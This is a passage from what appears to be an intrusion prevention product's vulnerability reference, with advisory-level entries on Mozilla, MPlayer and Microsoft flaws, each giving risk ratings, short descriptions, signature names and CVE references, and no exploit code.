A vulnerability exists in Mozilla Firefox, versions before 1.5.0.10, that allows remote attackers to cause a denial of service via a XUL XML documents which includes a null menupopup.menu.

Situation:

File-TextId_Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS

References:

CVE-2007-0775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775

BID-22694
http://www.securityfocus.com/bid/22694

OSVDB-32114
http://www.osvdb.org/32114

Mozilla-Floating-Layer-Column-Layout-DoS

About this vulnerability:

Mozilla Floating Layer Column Layout DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-669-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey

Type:

Browser

Description:

A vulnerability exists in Mozilla Firefox and Mozilla Thunderbird, versions before 1.5.0.10, and Mozilla Sea Monkey, versions before 1.0.8, that allows remote attackers to cause a denial of service by dynamically creating a new DOM node inside a floating layer with a columnar layout.

Situation:

File-Text_Mozilla-Firefox-Floating-Layer-Column-Layout-DoS

References:

CVE-2007-0775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775

BID-22694
http://www.securityfocus.com/bid/22694

OSVDB-32114
http://www.osvdb.org/32114

Mozilla-JavaScript-String-Replace-Buffer-Overflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-297-4219

Last changed:

sgpkg-ips-1412-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Buffer Overflow

Description:

Three is a heap buffer overflow vulnerability in Mozilla Firefox and SeaMonkey products. The vulnerability is due to improper processing of a crafted substring when performing the replace operation in JavaScript. A remote attacker can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation of this vulnerability can lead to arbitrary code execution with the privileges of the logged in user.

Situation:

HTTP_SS-Mozilla-JavaScript-String-Replace-Buffer-Overflow

References:

CVE-2009-3075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3075

BID-36343
http://www.securityfocus.com/bid/36343

Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-407-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been identified in Mozilla applications. The vulnerability is due to an integer overflow occurring when the reduceRight() method is called on a JavaScript array with an extremely large length. Remote attackers can exploit this vulnerability by enticing target users to open a malicious web page or file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged-on user. In case of a successful attack, the behaviour of the target depends on the intention of the malicious code. If an attack leveraging these vulnerabilities fails, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS_Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow
File-Text_Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow

References:

CVE-2011-2371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371

Mozilla-Multiple-Products-Multiple-Location-Headers

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Input Validation

Description:

A vulnerability has been detected in Mozilla Firefox, Thunderbird and SeaMonkey. When multiple Location, Content-Type, Content-Length or Content-Disposition headers are present in an HTTP response, these Mozilla products use the last one, making them more susceptible to newline insertion attacks. An attacker may leverage this vulnerability in conjunction with a vulnerable web application to e.g. redirect target users to malicious URLs.

Situation:

HTTP_SHS-Mozilla-Multiple-Products-Multiple-Location-Headers

References:

CVE-2011-3000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3000

OSVDB-75839
http://www.osvdb.org/75839

Mozilla-Multiple-Products-Table-Frames-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Malfunction

Description:

There is a code execution vulnerability in Mozilla Firefox, Seamonkey, and Thunderbird. The vulnerability is due to the nsTableFrame::InsertFrames method failing to handle mixed group table frames. A remote attacker could exploit this vulnerability by enticing a user to open a crafted web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Text_Mozilla-Multiple-Products-Table-Frames-Memory-Corruption

References:

CVE-2012-1952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1952

OSVDB-83999
http://www.osvdb.org/83999

Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-488-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability has been reported in Mozilla's Firefox, Thunderbird, and SeaMonkey products. The vulnerability exists in the nsWaveReader::DecodeAudioData function when processing WAV files. An attacker could exploit this vulnerability by enticing a target user to view crafted web content. Successful exploitation of this vulnerability would possibly result in execution of arbitrary attacker code on the target system in the security context of the user running the vulnerable application.

Situation:

File-RIFF_Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow

References:

CVE-2012-4186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4186

BID-56135
http://www.securityfocus.com/bid/56135

OSVDB-86117
http://www.osvdb.org/86117

Mozilla-Network-Security-Services-RSA-Signature-Forgery

About this vulnerability:

A vulnerability in Mozilla Foundation Network Security Services

Risk:

High

First detected in:

sgpkg-ips-613-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla NSS; Chrome

Type:

Integer Overflow

Description:

An RSA signature forgery vulnerability exists in Mozilla Network Security Services (NSS), the cryptographic library used in many applications including Firefox and Google Chrome. The vulnerability is a result of improper verification of RSA signatures due to incorrect ASN.1 parsing of the DigestInfo structure. A remote attacker could exploit this vulnerability by providing a forged certificate e.g. for a legitimate website. Successful exploitation would result in successful verification of the forged certificate, which could lead to information disclosure, spoofing and policy bypass.

Situation:

HTTPS_SS-Mozilla-Network-Security-Services-RSA-Signature-Forgery

References:

CVE-2014-1568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568

BID-70116
http://www.securityfocus.com/bid/70116

OSVDB-112036
http://www.osvdb.org/112036

Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow

About this vulnerability:

A vulnerability in Mozilla family of browsers

Risk:

Moderate

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Malfunction

Description:

There is a heap-based buffer overflow vulnerability in Mozilla Network Security Services (NSS). The vulnerability is due to a design error in the processing of malformed SSLv2 server messages. Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the vulnerable system in the context of the affected application.

Situation:

HTTPS_SS-Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow

References:

CVE-2007-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008

BID-22694
http://www.securityfocus.com/bid/22694

OSVDB-32105
http://www.osvdb.org/32105

Mozilla-Non-Ascii-Hostname-BOF

About this vulnerability:

Code execution vulnerability in Mozilla

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Suite; Mozilla Firefox; Mozilla Thunderbird; Netscape

Type:

Buffer Overflow

Description:

Mozilla browser and its derivates are prone to a remotely-exploitable heap overflow that is exposed when the browser handles non-ASCII characters in URIs. This issue could be exploited by enticing a user to open a hyperlink that references a malicious URI. Successful exploitation will allow execution of arbitrary code in the context of the client user.

Situation:

File-Text_Mozilla-Non-Ascii-Hostname-BOF

References:

CVE-2004-0902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0902

BID-11169
http://www.securityfocus.com/bid/11169

OSVDB-10528
http://www.osvdb.org/10528

Mozilla-NSS-Tls-Regexp-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Mozilla NSS regexp handling

Risk:

Moderate

First detected in:

sgpkg-ips-238-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Mozilla NSS

Type:

Buffer Overflow

Description:

Mozilla Foundation's Network Security Services (NSS) library suffers from a buffer overflow vulnerability in the handling of server certificates. A specially crafted server certificate may cause a buffer overflow in a client application, allowing remote attackers to execute arbitrary code on the host.

Situation:

HTTPS_SS-Mozilla-NSS-Tls-Regexp-Buffer-Overflow

References:

CVE-2009-2404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404

BID-35891
http://www.securityfocus.com/bid/35891

Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution

About this vulnerability:

A vulnerability in Mozilla Foundation PDF.js

Risk:

Moderate

First detected in:

sgpkg-ips-1744-5242

Last changed:

sgpkg-ips-1744-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Input Validation

Description:

Insufficient validation of the fonts in the opened PDF files causes a Javascript code injection vulnerability in Mozilla Firefox. A successful exploitation allows an attacker to execute arbitrary script code in a user's browser.

Situation:

File-PDF_Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution

References:

CVE-2024-4367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4367

Mozilla-Products-Animation-Timeline-Use-After-Free

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

High

First detected in:

sgpkg-ips-1828-5242

Last changed:

sgpkg-ips-1828-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird

Type:

Malfunction

Description:

A use after free vulnerability has been reported for Mozilla Firefox, Firefox ESR, and Thunderbird. The vulnerability is due to accessing freed AnimationTimeline and Animation objects while playing animations. A remote attacker could exploit this vulnerability by enticing a victim to visit a malicious web page or open a crafted email. Successful exploitation could result, in the worst case, in execution of arbitrary code in the context of the vulnerable application.

Situation:

File-Text_Mozilla-Products-Animation-Timeline-Use-After-Free

References:

CVE-2024-9680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9680

Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Mozilla products including Firefox, and SeaMonkey. The vulnerability exists due to an integer value used to store the names and values of plugin parameter elements could overflow, resulting in memory corruption and potentially allowing for arbitrary code execution. Remote attackers could exploit this vulnerability by enticing target users to visit a crafted web page. Successful exploitation would result in arbitrary code execution in the context of the logged on user.

Situation:

HTTP_SS-Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
File-Text_Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow

References:

CVE-2010-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1214

BID-41842
http://www.securityfocus.com/bid/41842

Mozilla-Products-IDN-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in Mozilla Foundation Firefox

Risk:

Low

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There exists a vulnerability in Mozilla Firefox version 1.0 and prior that allows remote attackers to spoof domain names.

Situation:

File-Text_Mozilla-Products-IDN-Spoofing-Vulnerability

References:

CVE-2005-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0233

BID-12470
http://www.securityfocus.com/bid/12470

Mozilla-Products-MathML-Integer-Overflow

About this vulnerability:

Vulnerability in Mozilla based browsers

Risk:

High

First detected in:

sgpkg-ips-211-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Malfunction

Description:

There is an integer overflow vulnerability in various Mozilla based browsers, such as Firefox and Seamonkey. There is no sufficient input validation for the value of the rowspan attribute in the mtd element. A large integer value causes memory corruption and may lead to execution of arbitrary code in the context of the current user.

Situation:

HTTP_SS-Mozilla-Products-MathML-Integer-Overflow
File-Text_Mozilla-Products-MathML-Integer-Overflow

References:

CVE-2008-4061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4061

BID-31346
http://www.securityfocus.com/bid/31346

Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow

About this vulnerability:

A vulnerability in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Mozilla products including Firefox, Thunderbird and SeaMonkey. The vulnerability exists due to a 16-bit integer value used in allocating the size of the array class to store CSS values that could overflow, resulting in too small a memory buffer being created. Remote attackers could exploit this vulnerability by enticing target users to visit a crafted web page. Successful exploitation would result in arbitrary code execution in the context of the logged on user.

Situation:

File-Text_Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow

References:

CVE-2010-2752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2752

BID-41852
http://www.securityfocus.com/bid/41852

Mozilla-Products-Overflow-Event-Handling-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in multiple Mozilla Foundation products

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Foundation's family of browser products. The flaw is due to improper data protection when handling the "overflow" and "underflow" DOM events raised by specific document layout changes. Successful exploitation of this issue can cause a denial of service condition and may allow remote attackers to execute arbitrary code in the context of the target browser.

Situation:

HTTP_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
File-Text_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption

References:

CVE-2007-2867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2867

BID-24242
http://www.securityfocus.com/bid/24242

OSVDB-35134
http://www.osvdb.org/35134

Mozilla-Products-QueryInterface-Method-Memory-Corruption

About this vulnerability:

A vulnerability in Mozilla based products

Risk:

High

First detected in:

sgpkg-ips-134-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird

Type:

Malfunction

Description:

There is a memory corruption vulnerability in various Mozilla based products. The flaw concerns a memory corruption issue caused by the QueryInterface method of the Location and Navigator objects. By persuading the target user to open a web page that contains malicious script, an attacker may execute arbitrary code in the context of the current user.

Situation:

HTTP_SS-Mozilla-Products-QueryInterface-Method-Memory-Corruption
File-Text_Mozilla-Products-QueryInterface-Method-Memory-Corruption

References:

CVE-2006-0295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0295

BID-16476
http://www.securityfocus.com/bid/16476

Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow

About this vulnerability:

Integer overflow vulnerability in the Scalable Vector Graphics rendering engine in Mozilla products

Risk:

High

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Suite

Type:

Buffer Overflow

Description:

An integer overflow vulnerability exists in certain versions of Mozilla products. The Scalable Vector Graphics (SVG) rendering engine fails to properly handle some property values of the SVG filter element. If the multiplication of 'width' and 'height' properties results in a large enough value, an integer overflow occurs and the engine allocates a memory block that is too small for its need. A remote attacker is able to exploit this vulnerability to cause a denial of service condition or to execute arbitrary code on the victim client.

Situation:

HTTP_SS-Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
File-TextId_Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow

References:

CVE-2006-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0297

BID-16476
http://www.securityfocus.com/bid/16476

Mozilla-Shell-Protocol-Validation

About this vulnerability:	A vulnerability in Mozilla
Risk:	High
First detected in:	sgpkg-ips-420-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows XP
Software:	Mozilla Browser; Mozilla Firefox; Mozilla Thunderbird; Netscape
Type:	Input Validation
Description:	There exists a vulnerability in the way products based on the Mozilla web engine validate URIs using the shell scheme. Using a specially crafted shell URI, an attacker can run executable files located on a target system, or start applications registered to handle certain file types. This vulnerability can also be used as a remote attack vector to vulnerabilities that would otherwise be considered local only.
Situation:	File-Text_Mozilla-Shell-Protocol-Validation

Mozilla-Soapparameter-Integer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Mozilla Foundation Mozilla Suite

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Suite

Type:

Malfunction

Description:

There is a vulnerability in several versions of the Mozilla and Netscape browsers' implementation of the Simple Object Access Protocol (SOAP). A specially crafted HTML page containing script code that leverages this vulnerability can allow an attacker to crash a client's browser application, or potentially introduce arbitrary code into the process flow, compromising the system. Is a simple denial of service attack case, the affected web browser will crash upon opening the malicious HTML page. Similarly, the vulnerable mail client will crash upon opening or previewing the malicious HTML mail. If an attacker performs a more completed code injection attack, then the behaviour of the target is dependant entirely on the injected code. Experiments show that the behaviour of the vulnerable products differ on Linux with regards to the excessively large array that is passed into the constructor SOAPParameter. This large array can be created with a large size (e.g., new Array(...)) or resized to a large size by a large index (e.g., arrayObject[index] = ...). On Linux, Mozilla will attempt to allocate all the elements of the array. First, there is a long wait in Mozilla as it tries to allocate a large array. Second, since the malicious script is attempting to create an array that is over 1 gigabyte in memory, an average system will run out of memory. The Linux operating system will terminate the Mozilla process because of the out of memory condition. As such, the vulnerability is never triggered.

Situation:

File-Text_Mozilla-Soapparameter-Integer-Overflow-Vulnerability

References:

CVE-2004-0722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0722

BID-10843
http://www.securityfocus.com/bid/10843

Mozilla-SVG-Data-Processing-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Mozilla based browsers

Risk:

High

First detected in:

sgpkg-ips-211-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey

Type:

Malfunction

Description:

There is a vulnerability in Mozilla-based browsers, such as Firefox and SeaMonkey. The vulnerability is due to insufficient validation when handling SVG data. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page and may lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Mozilla-SVG-Data-Processing-Memory-Corruption
File-TextId_Mozilla-SVG-Data-Processing-Memory-Corruption

References:

CVE-2009-0771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0771

BID-33990
http://www.securityfocus.com/bid/33990

MPack-Attack-Platform

About this vulnerability:	MPack Attack Platform
Risk:	High
First detected in:	sgpkg-ips-114-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic browser
Type:	Malfunction
Description:	MPack is an attack platform. It is able to deliver a configurable set of vulnerabilities that affect the browser that the target uses to access the site. Recent versions of MPack take advantage of server-side polymorphism: each request delivers a functionally identical but differently encoded version of the exploit code. In addition, MPack gathers extensive statistics about its targets.
Situation:	HTTP_MPack-Invisible-Inline-Frame HTTP_MPack-JavaScript-Decoder File-Text_MPack-JavaScript-Decoder

MPlayer-For-Windows-Calloc-Integer-Overflow

About this vulnerability:	A vulnerability in MPlayer for Win32 Project MPlayer
Risk:	Moderate
First detected in:	sgpkg-ips-413-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MPlayer
Type:	Integer Overflow
Description:	An integer overflow vulnerability has been reported in the MPlayer for Win32 project's port of the MPlayer media player. The integer overflow is due to a unchecked multiplication of two size values in a "calloc" replacement function. A remote attacker could exploit this vulnerability by enticing a target user to open a specially crafted media file in a vulnerable version of MPlayer. Successful exploitation could allow the execution of arbitrary code in the security context of the target user. An unsuccessful exploitation attempt could result in a denial of service condition.
Situation:	File-MPEG_MPlayer-For-Windows-Calloc-Integer-Overflow

MPlayer-Sami-Subtitle-Buffer-Overflow

About this vulnerability:

A vulnerability in MPlayer Project MPlayer

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MPlayer

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in MPlayer. Specifically, the vulnerability is due a stack buffer overflow when reading a long caption from a SAMI subtitle file. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to download a crafted SAMI file, resulting in the execution of arbitrary code in the security context of the target user.

Situation:

File-TextId_MPlayer-Sami-Subtitle-Buffer-Overflow

References:

OSVDB-74604
http://www.osvdb.org/74604

MPlayer-TwinVQ-File-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in MPlayer

Risk:

High

First detected in:

sgpkg-ips-225-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MPlayer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in MPlayer. The flaw is due to a boundary error when processing TwinVQ files. A remote attacker may exploit this vulnerability by persuading the target user to open a malicious TwinVQ file.

Situation:

HTTP_SS-MPlayer-TwinVQ-File-Handling-Buffer-Overflow
File-Binary_MPlayer-TwinVQ-File-Handling-Buffer-Overflow

References:

CVE-2008-5616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5616

BID-32822
http://www.securityfocus.com/bid/32822

MS-appinstaller-URI-Scheme

About this vulnerability:	ms-appinstaller URI scheme
Risk:	Moderate
First detected in:	sgpkg-ips-1672-5242
Last changed:	sgpkg-ips-1672-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	Ms-appinstaller protocol handler allows Windows App Installer to install apps directly from a web server. This URI scheme is not enabled by default and is known to be used as an access vector for ransomware and other malware.
Situation:	File-Text_MS-appinstaller-URI-Scheme-Link-In-HTML

MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004

About this vulnerability:

Authentication bypass vulnerability in MS ASP.NET (MS05-004)

Risk:

Low

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

Microsoft .NET Framework could allow unauthorized access caused by a canonicalization vulnerability in ASP.NET authorization component, also known as "Path Validation Vulnerability". A remote attacker could bypass the access restrictions for .aspx files by sending a request containing a backslash ('\') or url encoded backslash (%5C).

Situation:

HTTP_CSU-MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004

References:

CVE-2004-0847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847

BID-11342
http://www.securityfocus.com/bid/11342

OSVDB-10670
http://www.osvdb.org/10670

MS05-004
http://technet.microsoft.com/security/bulletin/MS05-004

MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034

About this vulnerability:

Microsoft Windows Compressed Folder Buffer Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

dunzip32.dll

Type:

Buffer Overflow

Description:

Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation.

Situation:

File-Zip_MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034

References:

CVE-2004-0575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0575

BID-11382
http://www.securityfocus.com/bid/11382

OSVDB-10695
http://www.osvdb.org/10695

MS04-034
http://technet.microsoft.com/security/bulletin/MS04-034

MS-Exchange-URL-Redirection-CVE-2014-6336

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

Moderate

First detected in:

sgpkg-ips-615-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

A vulnerability in Microsoft Exchange

Situation:

HTTP_CSU-MS-Exchange-URL-Redirection-CVE-2014-6336
File-Text_MS-Exchange-URL-Redirection-CVE-2014-6336

References:

CVE-2014-6336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6336

MS14-075
http://technet.microsoft.com/security/bulletin/MS14-075

MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Forefront Threat Management Gateway Client detected

Risk:

Moderate

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Threat Management Gateway Client

Type:

Malfunction

Description:

A heap buffer overflow vulnerability exists in the Microsoft Forefront Threat Management Gateway 2010 Client. The vulnerability is due to an error in the calculation of a buffer size in the NSPLookupServiceNext function. Potentially any application running on a system could be affected by this vulnerability due to the way Microsoft Forefront Threat Management Gateway is installed on a system.

Situation:

Generic_SS-MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
DNS-UDP_MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution

References:

CVE-2011-1889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1889

BID-48181
http://www.securityfocus.com/bid/48181

OSVDB-72933
http://www.osvdb.org/72933

MS11-040
http://technet.microsoft.com/security/bulletin/MS11-040

MS-Forefront-UAG-Default-Reflected-XSS

About this vulnerability:

A vulnerability in Microsoft Forefront Unified Access Gateway

Risk:

High

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1453-5242

Platform:

Windows

Software:

Microsoft Forefront Unified Access Gateway

Type:

Cross-site Scripting

Description:

A vulnerability in Microsoft Forefront Unified Access Gateway

Situation:

HTTP_CSU-MS-Forefront-UAG-Default-Reflected-XSS

References:

CVE-2011-1897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1897

MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079

MS-Forefront-UAG-ExcelTable-Reflected-XSS

About this vulnerability:

A vulnerability in Microsoft Forefront Unified Access Gateway

Risk:

High

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Unified Access Gateway

Type:

Cross-site Scripting

Description:

A vulnerability in Microsoft Forefront Unified Access Gateway

Situation:

HTTP_CRL-MS-Forefront-UAG-ExcelTable-Reflected-XSS

References:

CVE-2011-1896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1896

OSVDB-76233
http://www.osvdb.org/76233

MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079

MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS

About this vulnerability:

A vulnerability in Microsoft Forefront Unified Access Gateway

Risk:

High

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Unified Access Gateway

Type:

Cross-site Scripting

Description:

A vulnerability in Microsoft Forefront Unified Access Gateway

Situation:

HTTP_CRL-MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS

References:

CVE-2011-1895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1895

BID-49979
http://www.securityfocus.com/bid/49979

OSVDB-76235
http://www.osvdb.org/76235

MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079

MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Forefront Unified Access Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Unified Access Gateway

Type:

Malfunction

Description:

A vulnerability in Microsoft Forefront Unified Access Gateway

Situation:

HTTP_CSH-MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability

References:

CVE-2011-2012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2012

BID-49980
http://www.securityfocus.com/bid/49980

MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079

MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Forefront Unified Access Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Unified Access Gateway

Type:

Malfunction

Description:

A vulnerability in Microsoft Forefront Unified Access Gateway

Situation:

HTTP_SS-MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
File-Text_MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability

References:

CVE-2011-1969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1969

BID-49983
http://www.securityfocus.com/bid/49983

MS11-079
http://technet.microsoft.com/security/bulletin/MS11-079

MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Host Integration Server detected

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Host Integration Server

Type:

Malfunction

Description:

